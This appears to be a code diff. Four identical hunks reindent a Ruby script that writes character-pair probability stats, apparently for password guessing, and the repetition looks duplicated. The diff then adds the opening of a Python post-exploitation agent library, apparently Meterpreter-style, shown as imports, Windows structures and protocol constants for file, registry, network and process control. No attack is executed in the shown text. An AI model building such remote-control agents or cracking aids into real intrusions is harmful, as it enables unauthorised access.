+  puts "\t-a --alpha\t\tcharset: abcdefghijklmnopqrstuvwxyz"
+  puts "\t-A --alphamaj\t\tcharset: ABCDEFGHIJKLMNOPQRSTUVWXYZ"
+  puts "\t-l --alphanum\t\tcharset: alpha + num"
+  puts "\t-l --alphanummaj\tcharset: alpha + alphamaj + num"
+  puts "\t-s --all\t\tcharset: alpha + alphamaj + num + !@#$+=.*"
+  puts "\t-c --custom"
+  puts "\nExample:\n"
+  puts "#{$0} -f stats -s"
+  puts "#{$0} -f stats -c \"0123abc+=\""
+  exit
 end

 ch_alpha 	= 'abcdefghijklmnopqrstuvwxyz'
@@ -24,55 +24,55 @@ ch_num 		= '0123456789'
 ch_sp		= '!@#$+=.*'

 opts = GetoptLong.new(
-	[ '--help', '-h', GetoptLong::NO_ARGUMENT ],
-	[ '--file', '-f', GetoptLong::OPTIONAL_ARGUMENT],
-	[ '--all', '-s', GetoptLong::NO_ARGUMENT],
-	[ '--num', '-n', GetoptLong::NO_ARGUMENT],
-	[ '--alpha', '-a', GetoptLong::NO_ARGUMENT ],
-	[ '--alphamaj', '-A', GetoptLong::NO_ARGUMENT ],
-	[ '--alphanum', '-l', GetoptLong::NO_ARGUMENT ],
-	[ '--alphanummaj', '-L', GetoptLong::NO_ARGUMENT ],
-	[ '--custom', '-c', GetoptLong::OPTIONAL_ARGUMENT ]
+  [ '--help', '-h', GetoptLong::NO_ARGUMENT ],
+  [ '--file', '-f', GetoptLong::OPTIONAL_ARGUMENT],
+  [ '--all', '-s', GetoptLong::NO_ARGUMENT],
+  [ '--num', '-n', GetoptLong::NO_ARGUMENT],
+  [ '--alpha', '-a', GetoptLong::NO_ARGUMENT ],
+  [ '--alphamaj', '-A', GetoptLong::NO_ARGUMENT ],
+  [ '--alphanum', '-l', GetoptLong::NO_ARGUMENT ],
+  [ '--alphanummaj', '-L', GetoptLong::NO_ARGUMENT ],
+  [ '--custom', '-c', GetoptLong::OPTIONAL_ARGUMENT ]
 )

 charset = nil
 filename = "stats_out"

 opts.each do |opt, arg|
-	case opt
-	when '--help'
-		help
-	when '--file'
-		filename = arg
-	when '--num'
-		charset = ch_num
-	when '--alpha'
-		charset = ch_alpha
-	when '--alphamaj'
-		charset = ch_alpha.capitalize
-	when '--alphanum'
-		charset = ch_alpha + ch_num
-	when '--alphanummaj'
-		charset = ch_alpha.capitalize + ch_num
-	when '--all'
-		charset = ch_alpha + ch_alpha.capitalize + ch_num + ch_sp
-	when '--custom'
-		charset = arg
-	end
+  case opt
+  when '--help'
+    help
+  when '--file'
+    filename = arg
+  when '--num'
+    charset = ch_num
+  when '--alpha'
+    charset = ch_alpha
+  when '--alphamaj'
+    charset = ch_alpha.capitalize
+  when '--alphanum'
+    charset = ch_alpha + ch_num
+  when '--alphanummaj'
+    charset = ch_alpha.capitalize + ch_num
+  when '--all'
+    charset = ch_alpha + ch_alpha.capitalize + ch_num + ch_sp
+  when '--custom'
+    charset = arg
+  end
 end


 if charset == nil
-	help
+  help
 end


 fstat = File.open(filename, "w")
 charset.each_byte do |c|
-	fstat.write("1=proba1[#{c.to_s}]\n")
-	charset.each_byte do |tmp|
-		fstat.write("1=proba2[#{c.to_s}*256+#{tmp.to_s}]\n")
-	end
+  fstat.write("1=proba1[#{c.to_s}]\n")
+  charset.each_byte do |tmp|
+    fstat.write("1=proba2[#{c.to_s}*256+#{tmp.to_s}]\n")
+  end
 end
 fstat.close

@@ -3,20 +3,20 @@
 require 'getoptlong'

 def	help
-	puts "Usage: #{$0} [options]"
-	puts "\t-h --help\t\tthis help."
-	puts "\t-f --file\t\toutput file."
-	puts "\t-n --num\t\tcharset: 0123456789"
-	puts "\t-a --alpha\t\tcharset: abcdefghijklmnopqrstuvwxyz"
-	puts "\t-A --alphamaj\t\tcharset: ABCDEFGHIJKLMNOPQRSTUVWXYZ"
-	puts "\t-l --alphanum\t\tcharset: alpha + num"
-	puts "\t-l --alphanummaj\tcharset: alpha + alphamaj + num"
-	puts "\t-s --all\t\tcharset: alpha + alphamaj + num + !@#$+=.*"
-	puts "\t-c --custom"
-	puts "\nExample:\n"
-	puts "#{$0} -f stats -s"
-	puts "#{$0} -f stats -c \"0123abc+=\""
-	exit
+  puts "Usage: #{$0} [options]"
+  puts "\t-h --help\t\tthis help."
+  puts "\t-f --file\t\toutput file."
+  puts "\t-n --num\t\tcharset: 0123456789"
+  puts "\t-a --alpha\t\tcharset: abcdefghijklmnopqrstuvwxyz"
+  puts "\t-A --alphamaj\t\tcharset: ABCDEFGHIJKLMNOPQRSTUVWXYZ"
+  puts "\t-l --alphanum\t\tcharset: alpha + num"
+  puts "\t-l --alphanummaj\tcharset: alpha + alphamaj + num"
+  puts "\t-s --all\t\tcharset: alpha + alphamaj + num + !@#$+=.*"
+  puts "\t-c --custom"
+  puts "\nExample:\n"
+  puts "#{$0} -f stats -s"
+  puts "#{$0} -f stats -c \"0123abc+=\""
+  exit
 end

 ch_alpha 	= 'abcdefghijklmnopqrstuvwxyz'
@@ -24,55 +24,55 @@ ch_num 		= '0123456789'
 ch_sp		= '!@#$+=.*'

 opts = GetoptLong.new(
-	[ '--help', '-h', GetoptLong::NO_ARGUMENT ],
-	[ '--file', '-f', GetoptLong::OPTIONAL_ARGUMENT],
-	[ '--all', '-s', GetoptLong::NO_ARGUMENT],
-	[ '--num', '-n', GetoptLong::NO_ARGUMENT],
-	[ '--alpha', '-a', GetoptLong::NO_ARGUMENT ],
-	[ '--alphamaj', '-A', GetoptLong::NO_ARGUMENT ],
-	[ '--alphanum', '-l', GetoptLong::NO_ARGUMENT ],
-	[ '--alphanummaj', '-L', GetoptLong::NO_ARGUMENT ],
-	[ '--custom', '-c', GetoptLong::OPTIONAL_ARGUMENT ]
+  [ '--help', '-h', GetoptLong::NO_ARGUMENT ],
+  [ '--file', '-f', GetoptLong::OPTIONAL_ARGUMENT],
+  [ '--all', '-s', GetoptLong::NO_ARGUMENT],
+  [ '--num', '-n', GetoptLong::NO_ARGUMENT],
+  [ '--alpha', '-a', GetoptLong::NO_ARGUMENT ],
+  [ '--alphamaj', '-A', GetoptLong::NO_ARGUMENT ],
+  [ '--alphanum', '-l', GetoptLong::NO_ARGUMENT ],
+  [ '--alphanummaj', '-L', GetoptLong::NO_ARGUMENT ],
+  [ '--custom', '-c', GetoptLong::OPTIONAL_ARGUMENT ]
 )

 charset = nil
 filename = "stats_out"

 opts.each do |opt, arg|
-	case opt
-	when '--help'
-		help
-	when '--file'
-		filename = arg
-	when '--num'
-		charset = ch_num
-	when '--alpha'
-		charset = ch_alpha
-	when '--alphamaj'
-		charset = ch_alpha.capitalize
-	when '--alphanum'
-		charset = ch_alpha + ch_num
-	when '--alphanummaj'
-		charset = ch_alpha.capitalize + ch_num
-	when '--all'
-		charset = ch_alpha + ch_alpha.capitalize + ch_num + ch_sp
-	when '--custom'
-		charset = arg
-	end
+  case opt
+  when '--help'
+    help
+  when '--file'
+    filename = arg
+  when '--num'
+    charset = ch_num
+  when '--alpha'
+    charset = ch_alpha
+  when '--alphamaj'
+    charset = ch_alpha.capitalize
+  when '--alphanum'
+    charset = ch_alpha + ch_num
+  when '--alphanummaj'
+    charset = ch_alpha.capitalize + ch_num
+  when '--all'
+    charset = ch_alpha + ch_alpha.capitalize + ch_num + ch_sp
+  when '--custom'
+    charset = arg
+  end
 end


 if charset == nil
-	help
+  help
 end


 fstat = File.open(filename, "w")
 charset.each_byte do |c|
-	fstat.write("1=proba1[#{c.to_s}]\n")
-	charset.each_byte do |tmp|
-		fstat.write("1=proba2[#{c.to_s}*256+#{tmp.to_s}]\n")
-	end
+  fstat.write("1=proba1[#{c.to_s}]\n")
+  charset.each_byte do |tmp|
+    fstat.write("1=proba2[#{c.to_s}*256+#{tmp.to_s}]\n")
+  end
 end
 fstat.close

@@ -3,20 +3,20 @@
 require 'getoptlong'

 def	help
-	puts "Usage: #{$0} [options]"
-	puts "\t-h --help\t\tthis help."
-	puts "\t-f --file\t\toutput file."
-	puts "\t-n --num\t\tcharset: 0123456789"
-	puts "\t-a --alpha\t\tcharset: abcdefghijklmnopqrstuvwxyz"
-	puts "\t-A --alphamaj\t\tcharset: ABCDEFGHIJKLMNOPQRSTUVWXYZ"
-	puts "\t-l --alphanum\t\tcharset: alpha + num"
-	puts "\t-l --alphanummaj\tcharset: alpha + alphamaj + num"
-	puts "\t-s --all\t\tcharset: alpha + alphamaj + num + !@#$+=.*"
-	puts "\t-c --custom"
-	puts "\nExample:\n"
-	puts "#{$0} -f stats -s"
-	puts "#{$0} -f stats -c \"0123abc+=\""
-	exit
+  puts "Usage: #{$0} [options]"
+  puts "\t-h --help\t\tthis help."
+  puts "\t-f --file\t\toutput file."
+  puts "\t-n --num\t\tcharset: 0123456789"
+  puts "\t-a --alpha\t\tcharset: abcdefghijklmnopqrstuvwxyz"
+  puts "\t-A --alphamaj\t\tcharset: ABCDEFGHIJKLMNOPQRSTUVWXYZ"
+  puts "\t-l --alphanum\t\tcharset: alpha + num"
+  puts "\t-l --alphanummaj\tcharset: alpha + alphamaj + num"
+  puts "\t-s --all\t\tcharset: alpha + alphamaj + num + !@#$+=.*"
+  puts "\t-c --custom"
+  puts "\nExample:\n"
+  puts "#{$0} -f stats -s"
+  puts "#{$0} -f stats -c \"0123abc+=\""
+  exit
 end

 ch_alpha 	= 'abcdefghijklmnopqrstuvwxyz'
@@ -24,55 +24,55 @@ ch_num 		= '0123456789'
 ch_sp		= '!@#$+=.*'

 opts = GetoptLong.new(
-	[ '--help', '-h', GetoptLong::NO_ARGUMENT ],
-	[ '--file', '-f', GetoptLong::OPTIONAL_ARGUMENT],
-	[ '--all', '-s', GetoptLong::NO_ARGUMENT],
-	[ '--num', '-n', GetoptLong::NO_ARGUMENT],
-	[ '--alpha', '-a', GetoptLong::NO_ARGUMENT ],
-	[ '--alphamaj', '-A', GetoptLong::NO_ARGUMENT ],
-	[ '--alphanum', '-l', GetoptLong::NO_ARGUMENT ],
-	[ '--alphanummaj', '-L', GetoptLong::NO_ARGUMENT ],
-	[ '--custom', '-c', GetoptLong::OPTIONAL_ARGUMENT ]
+  [ '--help', '-h', GetoptLong::NO_ARGUMENT ],
+  [ '--file', '-f', GetoptLong::OPTIONAL_ARGUMENT],
+  [ '--all', '-s', GetoptLong::NO_ARGUMENT],
+  [ '--num', '-n', GetoptLong::NO_ARGUMENT],
+  [ '--alpha', '-a', GetoptLong::NO_ARGUMENT ],
+  [ '--alphamaj', '-A', GetoptLong::NO_ARGUMENT ],
+  [ '--alphanum', '-l', GetoptLong::NO_ARGUMENT ],
+  [ '--alphanummaj', '-L', GetoptLong::NO_ARGUMENT ],
+  [ '--custom', '-c', GetoptLong::OPTIONAL_ARGUMENT ]
 )

 charset = nil
 filename = "stats_out"

 opts.each do |opt, arg|
-	case opt
-	when '--help'
-		help
-	when '--file'
-		filename = arg
-	when '--num'
-		charset = ch_num
-	when '--alpha'
-		charset = ch_alpha
-	when '--alphamaj'
-		charset = ch_alpha.capitalize
-	when '--alphanum'
-		charset = ch_alpha + ch_num
-	when '--alphanummaj'
-		charset = ch_alpha.capitalize + ch_num
-	when '--all'
-		charset = ch_alpha + ch_alpha.capitalize + ch_num + ch_sp
-	when '--custom'
-		charset = arg
-	end
+  case opt
+  when '--help'
+    help
+  when '--file'
+    filename = arg
+  when '--num'
+    charset = ch_num
+  when '--alpha'
+    charset = ch_alpha
+  when '--alphamaj'
+    charset = ch_alpha.capitalize
+  when '--alphanum'
+    charset = ch_alpha + ch_num
+  when '--alphanummaj'
+    charset = ch_alpha.capitalize + ch_num
+  when '--all'
+    charset = ch_alpha + ch_alpha.capitalize + ch_num + ch_sp
+  when '--custom'
+    charset = arg
+  end
 end


 if charset == nil
-	help
+  help
 end


 fstat = File.open(filename, "w")
 charset.each_byte do |c|
-	fstat.write("1=proba1[#{c.to_s}]\n")
-	charset.each_byte do |tmp|
-		fstat.write("1=proba2[#{c.to_s}*256+#{tmp.to_s}]\n")
-	end
+  fstat.write("1=proba1[#{c.to_s}]\n")
+  charset.each_byte do |tmp|
+    fstat.write("1=proba2[#{c.to_s}*256+#{tmp.to_s}]\n")
+  end
 end
 fstat.close

@@ -3,20 +3,20 @@
 require 'getoptlong'

 def	help
-	puts "Usage: #{$0} [options]"
-	puts "\t-h --help\t\tthis help."
-	puts "\t-f --file\t\toutput file."
-	puts "\t-n --num\t\tcharset: 0123456789"
-	puts "\t-a --alpha\t\tcharset: abcdefghijklmnopqrstuvwxyz"
-	puts "\t-A --alphamaj\t\tcharset: ABCDEFGHIJKLMNOPQRSTUVWXYZ"
-	puts "\t-l --alphanum\t\tcharset: alpha + num"
-	puts "\t-l --alphanummaj\tcharset: alpha + alphamaj + num"
-	puts "\t-s --all\t\tcharset: alpha + alphamaj + num + !@#$+=.*"
-	puts "\t-c --custom"
-	puts "\nExample:\n"
-	puts "#{$0} -f stats -s"
-	puts "#{$0} -f stats -c \"0123abc+=\""
-	exit
+  puts "Usage: #{$0} [options]"
+  puts "\t-h --help\t\tthis help."
+  puts "\t-f --file\t\toutput file."
+  puts "\t-n --num\t\tcharset: 0123456789"
+  puts "\t-a --alpha\t\tcharset: abcdefghijklmnopqrstuvwxyz"
+  puts "\t-A --alphamaj\t\tcharset: ABCDEFGHIJKLMNOPQRSTUVWXYZ"
+  puts "\t-l --alphanum\t\tcharset: alpha + num"
+  puts "\t-l --alphanummaj\tcharset: alpha + alphamaj + num"
+  puts "\t-s --all\t\tcharset: alpha + alphamaj + num + !@#$+=.*"
+  puts "\t-c --custom"
+  puts "\nExample:\n"
+  puts "#{$0} -f stats -s"
+  puts "#{$0} -f stats -c \"0123abc+=\""
+  exit
 end

 ch_alpha 	= 'abcdefghijklmnopqrstuvwxyz'
@@ -24,55 +24,55 @@ ch_num 		= '0123456789'
 ch_sp		= '!@#$+=.*'

 opts = GetoptLong.new(
-	[ '--help', '-h', GetoptLong::NO_ARGUMENT ],
-	[ '--file', '-f', GetoptLong::OPTIONAL_ARGUMENT],
-	[ '--all', '-s', GetoptLong::NO_ARGUMENT],
-	[ '--num', '-n', GetoptLong::NO_ARGUMENT],
-	[ '--alpha', '-a', GetoptLong::NO_ARGUMENT ],
-	[ '--alphamaj', '-A', GetoptLong::NO_ARGUMENT ],
-	[ '--alphanum', '-l', GetoptLong::NO_ARGUMENT ],
-	[ '--alphanummaj', '-L', GetoptLong::NO_ARGUMENT ],
-	[ '--custom', '-c', GetoptLong::OPTIONAL_ARGUMENT ]
+  [ '--help', '-h', GetoptLong::NO_ARGUMENT ],
+  [ '--file', '-f', GetoptLong::OPTIONAL_ARGUMENT],
+  [ '--all', '-s', GetoptLong::NO_ARGUMENT],
+  [ '--num', '-n', GetoptLong::NO_ARGUMENT],
+  [ '--alpha', '-a', GetoptLong::NO_ARGUMENT ],
+  [ '--alphamaj', '-A', GetoptLong::NO_ARGUMENT ],
+  [ '--alphanum', '-l', GetoptLong::NO_ARGUMENT ],
+  [ '--alphanummaj', '-L', GetoptLong::NO_ARGUMENT ],
+  [ '--custom', '-c', GetoptLong::OPTIONAL_ARGUMENT ]
 )

 charset = nil
 filename = "stats_out"

 opts.each do |opt, arg|
-	case opt
-	when '--help'
-		help
-	when '--file'
-		filename = arg
-	when '--num'
-		charset = ch_num
-	when '--alpha'
-		charset = ch_alpha
-	when '--alphamaj'
-		charset = ch_alpha.capitalize
-	when '--alphanum'
-		charset = ch_alpha + ch_num
-	when '--alphanummaj'
-		charset = ch_alpha.capitalize + ch_num
-	when '--all'
-		charset = ch_alpha + ch_alpha.capitalize + ch_num + ch_sp
-	when '--custom'
-		charset = arg
-	end
+  case opt
+  when '--help'
+    help
+  when '--file'
+    filename = arg
+  when '--num'
+    charset = ch_num
+  when '--alpha'
+    charset = ch_alpha
+  when '--alphamaj'
+    charset = ch_alpha.capitalize
+  when '--alphanum'
+    charset = ch_alpha + ch_num
+  when '--alphanummaj'
+    charset = ch_alpha.capitalize + ch_num
+  when '--all'
+    charset = ch_alpha + ch_alpha.capitalize + ch_num + ch_sp
+  when '--custom'
+    charset = arg
+  end
 end


 if charset == nil
-	help
+  help
 end


 fstat = File.open(filename, "w")
 charset.each_byte do |c|
-	fstat.write("1=proba1[#{c.to_s}]\n")
-	charset.each_byte do |tmp|
-		fstat.write("1=proba2[#{c.to_s}*256+#{tmp.to_s}]\n")
-	end
+  fstat.write("1=proba1[#{c.to_s}]\n")
+  charset.each_byte do |tmp|
+    fstat.write("1=proba2[#{c.to_s}*256+#{tmp.to_s}]\n")
+  end
 end
 fstat.close

@@ -3,20 +3,20 @@
 require 'getoptlong'

 def	help
-	puts "Usage: #{$0} [options]"
-	puts "\t-h --help\t\tthis help."
-	puts "\t-f --file\t\toutput file."
-	puts "\t-n --num\t\tcharset: 0123456789"
-	puts "\t-a --alpha\t\tcharset: abcdefghijklmnopqrstuvwxyz"
-	puts "\t-A --alphamaj\t\tcharset: ABCDEFGHIJKLMNOPQRSTUVWXYZ"
-	puts "\t-l --alphanum\t\tcharset: alpha + num"
-	puts "\t-l --alphanummaj\tcharset: alpha + alphamaj + num"
-	puts "\t-s --all\t\tcharset: alpha + alphamaj + num + !@#$+=.*"
-	puts "\t-c --custom"
-	puts "\nExample:\n"
-	puts "#{$0} -f stats -s"
-	puts "#{$0} -f stats -c \"0123abc+=\""
-	exit
+  puts "Usage: #{$0} [options]"
+  puts "\t-h --help\t\tthis help."
+  puts "\t-f --file\t\toutput file."
+  puts "\t-n --num\t\tcharset: 0123456789"
+  puts "\t-a --alpha\t\tcharset: abcdefghijklmnopqrstuvwxyz"
+  puts "\t-A --alphamaj\t\tcharset: ABCDEFGHIJKLMNOPQRSTUVWXYZ"
+  puts "\t-l --alphanum\t\tcharset: alpha + num"
+  puts "\t-l --alphanummaj\tcharset: alpha + alphamaj + num"
+  puts "\t-s --all\t\tcharset: alpha + alphamaj + num + !@#$+=.*"
+  puts "\t-c --custom"
+  puts "\nExample:\n"
+  puts "#{$0} -f stats -s"
+  puts "#{$0} -f stats -c \"0123abc+=\""
+  exit
 end

 ch_alpha 	= 'abcdefghijklmnopqrstuvwxyz'
@@ -24,55 +24,55 @@ ch_num 		= '0123456789'
 ch_sp		= '!@#$+=.*'

 opts = GetoptLong.new(
-	[ '--help', '-h', GetoptLong::NO_ARGUMENT ],
-	[ '--file', '-f', GetoptLong::OPTIONAL_ARGUMENT],
-	[ '--all', '-s', GetoptLong::NO_ARGUMENT],
-	[ '--num', '-n', GetoptLong::NO_ARGUMENT],
-	[ '--alpha', '-a', GetoptLong::NO_ARGUMENT ],
-	[ '--alphamaj', '-A', GetoptLong::NO_ARGUMENT ],
-	[ '--alphanum', '-l', GetoptLong::NO_ARGUMENT ],
-	[ '--alphanummaj', '-L', GetoptLong::NO_ARGUMENT ],
-	[ '--custom', '-c', GetoptLong::OPTIONAL_ARGUMENT ]
+  [ '--help', '-h', GetoptLong::NO_ARGUMENT ],
+  [ '--file', '-f', GetoptLong::OPTIONAL_ARGUMENT],
+  [ '--all', '-s', GetoptLong::NO_ARGUMENT],
+  [ '--num', '-n', GetoptLong::NO_ARGUMENT],
+  [ '--alpha', '-a', GetoptLong::NO_ARGUMENT ],
+  [ '--alphamaj', '-A', GetoptLong::NO_ARGUMENT ],
+  [ '--alphanum', '-l', GetoptLong::NO_ARGUMENT ],
+  [ '--alphanummaj', '-L', GetoptLong::NO_ARGUMENT ],
+  [ '--custom', '-c', GetoptLong::OPTIONAL_ARGUMENT ]
 )

 charset = nil
 filename = "stats_out"

 opts.each do |opt, arg|
-	case opt
-	when '--help'
-		help
-	when '--file'
-		filename = arg
-	when '--num'
-		charset = ch_num
-	when '--alpha'
-		charset = ch_alpha
-	when '--alphamaj'
-		charset = ch_alpha.capitalize
-	when '--alphanum'
-		charset = ch_alpha + ch_num
-	when '--alphanummaj'
-		charset = ch_alpha.capitalize + ch_num
-	when '--all'
-		charset = ch_alpha + ch_alpha.capitalize + ch_num + ch_sp
-	when '--custom'
-		charset = arg
-	end
+  case opt
+  when '--help'
+    help
+  when '--file'
+    filename = arg
+  when '--num'
+    charset = ch_num
+  when '--alpha'
+    charset = ch_alpha
+  when '--alphamaj'
+    charset = ch_alpha.capitalize
+  when '--alphanum'
+    charset = ch_alpha + ch_num
+  when '--alphanummaj'
+    charset = ch_alpha.capitalize + ch_num
+  when '--all'
+    charset = ch_alpha + ch_alpha.capitalize + ch_num + ch_sp
+  when '--custom'
+    charset = arg
+  end
 end


 if charset == nil
-	help
+  help
 end


 fstat = File.open(filename, "w")
 charset.each_byte do |c|
-	fstat.write("1=proba1[#{c.to_s}]\n")
-	charset.each_byte do |tmp|
-		fstat.write("1=proba2[#{c.to_s}*256+#{tmp.to_s}]\n")
-	end
+  fstat.write("1=proba1[#{c.to_s}]\n")
+  charset.each_byte do |tmp|
+    fstat.write("1=proba2[#{c.to_s}*256+#{tmp.to_s}]\n")
+  end
 end
 fstat.close

@@ -0,0 +1,928 @@
+import ctypes
+import fnmatch
+import getpass
+import os
+import platform
+import shlex
+import shutil
+import socket
+import struct
+import subprocess
+import sys
+
+has_windll = hasattr(ctypes, 'windll')
+
+try:
+	import pty
+	has_pty = True
+except ImportError:
+	has_pty = False
+
+try:
+	import pwd
+	has_pwd = True
+except ImportError:
+	has_pwd = False
+
+try:
+	import termios
+	has_termios = True
+except ImportError:
+	has_termios = False
+
+try:
+	import _winreg as winreg
+	has_winreg = True
+except ImportError:
+	has_winreg = False
+
+class PROCESSENTRY32(ctypes.Structure):
+	_fields_ = [("dwSize", ctypes.c_uint32),
+		("cntUsage", ctypes.c_uint32),
+		("th32ProcessID", ctypes.c_uint32),
+		("th32DefaultHeapID", ctypes.c_void_p),
+		("th32ModuleID", ctypes.c_uint32),
+		("cntThreads", ctypes.c_uint32),
+		("th32ParentProcessID", ctypes.c_uint32),
+		("thPriClassBase", ctypes.c_int32),
+		("dwFlags", ctypes.c_uint32),
+		("szExeFile", (ctypes.c_char * 260))]
+
+class SYSTEM_INFO(ctypes.Structure):
+	_fields_ = [("wProcessorArchitecture", ctypes.c_uint16),
+		("wReserved", ctypes.c_uint16),
+		("dwPageSize", ctypes.c_uint32),
+		("lpMinimumApplicationAddress", ctypes.c_void_p),
+		("lpMaximumApplicationAddress", ctypes.c_void_p),
+		("dwActiveProcessorMask", ctypes.c_uint32),
+		("dwNumberOfProcessors", ctypes.c_uint32),
+		("dwProcessorType", ctypes.c_uint32),
+		("dwAllocationGranularity", ctypes.c_uint32),
+		("wProcessorLevel", ctypes.c_uint16),
+		("wProcessorRevision", ctypes.c_uint16),]
+
+class SID_AND_ATTRIBUTES(ctypes.Structure):
+	_fields_ = [("Sid", ctypes.c_void_p),
+		("Attributes", ctypes.c_uint32),]
+
+##
+# STDAPI
+##
+
+#
+# TLV Meta Types
+#
+TLV_META_TYPE_NONE =       (   0   )
+TLV_META_TYPE_STRING =     (1 << 16)
+TLV_META_TYPE_UINT =       (1 << 17)
+TLV_META_TYPE_RAW =        (1 << 18)
+TLV_META_TYPE_BOOL =       (1 << 19)
+TLV_META_TYPE_COMPRESSED = (1 << 29)
+TLV_META_TYPE_GROUP =      (1 << 30)
+TLV_META_TYPE_COMPLEX =    (1 << 31)
+# not defined in original
+TLV_META_TYPE_MASK =    (1<<31)+(1<<30)+(1<<29)+(1<<19)+(1<<18)+(1<<17)+(1<<16)
+
+#
+# TLV Specific Types
+#
+TLV_TYPE_ANY =                 TLV_META_TYPE_NONE   |   0
+TLV_TYPE_METHOD =              TLV_META_TYPE_STRING |   1
+TLV_TYPE_REQUEST_ID =          TLV_META_TYPE_STRING |   2
+TLV_TYPE_EXCEPTION =           TLV_META_TYPE_GROUP  |   3
+TLV_TYPE_RESULT =              TLV_META_TYPE_UINT   |   4
+
+TLV_TYPE_STRING =              TLV_META_TYPE_STRING |  10
+TLV_TYPE_UINT =                TLV_META_TYPE_UINT   |  11
+TLV_TYPE_BOOL =                TLV_META_TYPE_BOOL   |  12
+
+TLV_TYPE_LENGTH =              TLV_META_TYPE_UINT   |  25
+TLV_TYPE_DATA =                TLV_META_TYPE_RAW    |  26
+TLV_TYPE_FLAGS =               TLV_META_TYPE_UINT   |  27
+
+TLV_TYPE_CHANNEL_ID =          TLV_META_TYPE_UINT   |  50
+TLV_TYPE_CHANNEL_TYPE =        TLV_META_TYPE_STRING |  51
+TLV_TYPE_CHANNEL_DATA =        TLV_META_TYPE_RAW    |  52
+TLV_TYPE_CHANNEL_DATA_GROUP =  TLV_META_TYPE_GROUP  |  53
+TLV_TYPE_CHANNEL_CLASS =       TLV_META_TYPE_UINT   |  54
+
+##
+# General
+##
+TLV_TYPE_HANDLE =              TLV_META_TYPE_UINT    |  600
+TLV_TYPE_INHERIT =             TLV_META_TYPE_BOOL    |  601
+TLV_TYPE_PROCESS_HANDLE =      TLV_META_TYPE_UINT    |  630
+TLV_TYPE_THREAD_HANDLE =       TLV_META_TYPE_UINT    |  631
+
+##
+# Fs
+##
+TLV_TYPE_DIRECTORY_PATH =      TLV_META_TYPE_STRING  | 1200
+TLV_TYPE_FILE_NAME =           TLV_META_TYPE_STRING  | 1201
+TLV_TYPE_FILE_PATH =           TLV_META_TYPE_STRING  | 1202
+TLV_TYPE_FILE_MODE =           TLV_META_TYPE_STRING  | 1203
+TLV_TYPE_FILE_SIZE =           TLV_META_TYPE_UINT    | 1204
+
+TLV_TYPE_STAT_BUF =            TLV_META_TYPE_COMPLEX | 1220
+
+TLV_TYPE_SEARCH_RECURSE =      TLV_META_TYPE_BOOL    | 1230
+TLV_TYPE_SEARCH_GLOB =         TLV_META_TYPE_STRING  | 1231
+TLV_TYPE_SEARCH_ROOT =         TLV_META_TYPE_STRING  | 1232
+TLV_TYPE_SEARCH_RESULTS =      TLV_META_TYPE_GROUP   | 1233
+
+##
+# Net
+##
+TLV_TYPE_HOST_NAME =           TLV_META_TYPE_STRING  | 1400
+TLV_TYPE_PORT =                TLV_META_TYPE_UINT    | 1401
+
+TLV_TYPE_SUBNET =              TLV_META_TYPE_RAW     | 1420
+TLV_TYPE_NETMASK =             TLV_META_TYPE_RAW     | 1421
+TLV_TYPE_GATEWAY =             TLV_META_TYPE_RAW     | 1422
+TLV_TYPE_NETWORK_ROUTE =       TLV_META_TYPE_GROUP   | 1423
+
+TLV_TYPE_IP =                  TLV_META_TYPE_RAW     | 1430
+TLV_TYPE_MAC_ADDRESS =         TLV_META_TYPE_RAW     | 1431
+TLV_TYPE_MAC_NAME =            TLV_META_TYPE_STRING  | 1432
+TLV_TYPE_NETWORK_INTERFACE =   TLV_META_TYPE_GROUP   | 1433
+
+TLV_TYPE_SUBNET_STRING =       TLV_META_TYPE_STRING  | 1440
+TLV_TYPE_NETMASK_STRING =      TLV_META_TYPE_STRING  | 1441
+TLV_TYPE_GATEWAY_STRING =      TLV_META_TYPE_STRING  | 1442
+TLV_TYPE_ROUTE_METRIC =        TLV_META_TYPE_UINT    | 1443
+TLV_TYPE_ADDR_TYPE =           TLV_META_TYPE_UINT    | 1444
+
+# Socket
+TLV_TYPE_PEER_HOST =           TLV_META_TYPE_STRING  | 1500
+TLV_TYPE_PEER_PORT =           TLV_META_TYPE_UINT    | 1501
+TLV_TYPE_LOCAL_HOST =          TLV_META_TYPE_STRING  | 1502
+TLV_TYPE_LOCAL_PORT =          TLV_META_TYPE_UINT    | 1503
+TLV_TYPE_CONNECT_RETRIES =     TLV_META_TYPE_UINT    | 1504
+
+TLV_TYPE_SHUTDOWN_HOW =        TLV_META_TYPE_UINT    | 1530
+
+# Registry
+TLV_TYPE_HKEY               = TLV_META_TYPE_UINT    | 1000
+TLV_TYPE_ROOT_KEY           = TLV_TYPE_HKEY
+TLV_TYPE_BASE_KEY           = TLV_META_TYPE_STRING  | 1001
+TLV_TYPE_PERMISSION         = TLV_META_TYPE_UINT    | 1002
+TLV_TYPE_KEY_NAME           = TLV_META_TYPE_STRING  | 1003
+TLV_TYPE_VALUE_NAME         = TLV_META_TYPE_STRING  | 1010
+TLV_TYPE_VALUE_TYPE         = TLV_META_TYPE_UINT    | 1011
+TLV_TYPE_VALUE_DATA         = TLV_META_TYPE_RAW     | 1012
+TLV_TYPE_TARGET_HOST        = TLV_META_TYPE_STRING  | 1013
+
+# Config
+TLV_TYPE_COMPUTER_NAME =       TLV_META_TYPE_STRING  | 1040
+TLV_TYPE_OS_NAME =             TLV_META_TYPE_STRING  | 1041
+TLV_TYPE_USER_NAME =           TLV_META_TYPE_STRING  | 1042
+TLV_TYPE_ARCHITECTURE  =       TLV_META_TYPE_STRING  | 1043
+
+DELETE_KEY_FLAG_RECURSIVE = (1 << 0)
+
+# Process
+TLV_TYPE_BASE_ADDRESS =        TLV_META_TYPE_UINT    | 2000
+TLV_TYPE_ALLOCATION_TYPE =     TLV_META_TYPE_UINT    | 2001
+TLV_TYPE_PROTECTION =          TLV_META_TYPE_UINT    | 2002
+TLV_TYPE_PROCESS_PERMS =       TLV_META_TYPE_UINT    | 2003
+TLV_TYPE_PROCESS_MEMORY =      TLV_META_TYPE_RAW     | 2004
+TLV_TYPE_ALLOC_BASE_ADDRESS =  TLV_META_TYPE_UINT    | 2005
+TLV_TYPE_MEMORY_STATE =        TLV_META_TYPE_UINT    | 2006
+TLV_TYPE_MEMORY_TYPE =         TLV_META_TYPE_UINT    | 2007
+TLV_TYPE_ALLOC_PROTECTION =    TLV_META_TYPE_UINT    | 2008
+TLV_TYPE_PID =                 TLV_META_TYPE_UINT    | 2300
+TLV_TYPE_PROCESS_NAME =        TLV_META_TYPE_STRING  | 2301
+TLV_TYPE_PROCESS_PATH =        TLV_META_TYPE_STRING  | 2302
+TLV_TYPE_PROCESS_GROUP =       TLV_META_TYPE_GROUP   | 2303
